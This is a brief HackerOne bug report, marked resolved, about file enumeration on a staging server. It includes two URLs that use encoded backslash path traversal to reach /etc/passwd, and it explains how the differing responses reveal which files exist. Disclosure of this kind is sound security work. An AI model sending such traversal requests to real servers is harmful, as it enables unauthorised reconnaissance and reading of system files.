File name/folder enumeration.
Unknown
Vulnerability Details
Hello,
an attacker may be able to map your server and find configuration file names by the following method:
Valid attempt (Not found):
https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
Invalid attempt (404)
https://staging.factlink.com/%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd_Nonexistant
Actions
View on HackerOneReport Stats
- Report ID: 35823
- State: Closed
- Substate: resolved
- Upvotes: 3